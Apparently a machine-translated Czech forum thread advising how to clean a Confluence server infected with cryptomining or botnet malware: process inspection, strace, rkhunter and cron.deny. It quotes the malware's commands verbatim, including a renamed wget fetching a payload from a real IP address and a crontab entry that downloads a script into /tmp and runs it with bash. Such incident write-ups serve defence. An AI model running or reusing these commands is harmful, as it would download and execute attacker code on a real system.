Váš server vypadá jako hacknutý. Podívejte se prosím pozorně na seznam procesů, např. spusťte ps auxc a podívejte se na binární zdroje procesu.
Ke skenování vašeho serveru můžete použít nástroje jako rkhunter, ale obecně byste měli na začátku zabít vše, co jste dostali jako confluence user, prohledat váš server/účet, upgradovat váš confluence (ve většině případů uživatelsky určený zdroj útoku) a podívat se ve vašem soutoku pro další účty atd.
Chcete-li vidět, co je v tomto procesu, podívejte se na /proc např. v ls -la /proc/996 . Také tam uvidíte zdrojový binární soubor. Můžete také obědvat strace -ff -p 996 abyste viděli, co proces dělá, nebo cat /proc/996/exe | strings abyste viděli, jaké řetězce má tato binární soustava. Toto je pravděpodobně nějaká část botnetu, těžař atd.
Měl jsem stejný problém, byl hacknutý, virový skript byl v /tmp, najděte název skriptu z příkazu "top" (nepodstatná písmena, jméno "fcbk6hj" bylo moje. ) a zabijte procesy (možná 3 procesy)
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
zabijte je všechny a smažte /tmp/prot a ukončete proces /boot/vmlinuz, CPU je zpět.
Zjistil jsem, že virus stáhl skript do /tmp automaticky, moje metoda byla mv wgetak na jiné jméno.
Virus behavious:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
nalezen následující úkol byl napsán v crontab, stačí jej smazat:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame
Po odstranění ze systému a crontab je možná dobrý nápad (alespoň prozatím) přidat confluence user do /etc/cron.deny .
A po:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information